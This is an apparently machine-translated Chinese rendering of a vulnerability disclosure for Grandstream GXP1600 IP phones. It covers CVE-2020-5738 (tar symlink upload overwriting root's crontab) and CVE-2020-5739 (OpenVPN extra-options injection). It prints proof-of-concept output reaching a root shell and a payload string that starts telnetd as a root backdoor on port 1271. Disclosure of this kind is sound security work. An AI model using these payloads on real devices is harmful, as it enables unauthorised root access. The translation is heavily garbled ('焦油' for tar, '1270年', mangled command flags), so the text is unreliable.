Grandstream GXP1600系列多个问题

虽然调查Grandstream GXP1625,站得住脚的发现几个漏洞,允许经过身份验证的远程攻击者获得根访问。

cve - 2020 - 5738:验证通过焦油上传远端控制设备

身份验证的远程攻击者可以滥用的端点/目录/ upload_vpntar实现任意代码执行根。upload_vpntar打开到接受一个tar文件/var/user/openvpn/。要删除的操作将允许符号链接/var/user/openvpn。攻击者可以将通过符号链接解压到磁盘上的任何地方可写。具体来说,/var/spool/cron/crontabs/目录是可写的。通过覆盖根crontab文件,攻击者可以执行任意脚本,因此实现根访问。

下面是我们的概念证明的输出,您可以发现GitHub。PoC将上传一个tar文件将覆盖根cron和执行该脚本/var/user/openvpn/attack_script1270年启用一个后门。请注意,可能需要一分钟定时任务的处理。

albinolobster@ubuntu: ~ / poc / grandstream gxp1600 telnet 192.168.2.104 1270美元在192.168.2.104……telnet:无法连接到远程主机连接拒绝albinolobster@ubuntu: ~ / poc / grandstream gxp1600美元python3 upload_rce。py - 192.168.2.104 - p 80——通过labpass1[+]通过http://192.168.2.104:80登录/目录/ dologin[+]登录。席德:197489727 e1586805795[+]上传焦油[+]成功!albinolobster@ubuntu: ~ / poc / grandstream gxp1600 telnet 192.168.2.104 1270美元在192.168.2.104……telnet:无法连接到远程主机连接拒绝albinolobster@ubuntu: ~ / poc / grandstream gxp1600 telnet 192.168.2.104 1270美元在192.168.2.104……连接到192.168.2.104。转义字符“^]”。# uname - Linux gxp1625_000b82af91ab 3.4.20-rt31-dvf-v1.3.1.2-rc1 # 5抢占星期五2019年10月11日11:56:43 PDT armv5tejl GNU / Linux根# #显示本用户信息

通过OpenVPN cve - 2020 - 5739:身份验证的远端控制设备配置文件

身份验证的远程攻击者可以滥用OpenVPN设置实现作为根用户执行任意代码。的附加选项字段允许用户添加任意OpenVPN配置设置配置文件。如果一个用户添加以下:

script-security 2;”/ bin /灰- c telnetd - l /bin/sh - p 1271”;

然后,当VPN连接已经建立,OpenVPN将执行了脚本从而打开一个根后门在端口1271上。如果你不介意的话有点自我推销,我建议这种攻击在博客标题,反向壳从一个OpenVPN配置文件几年前。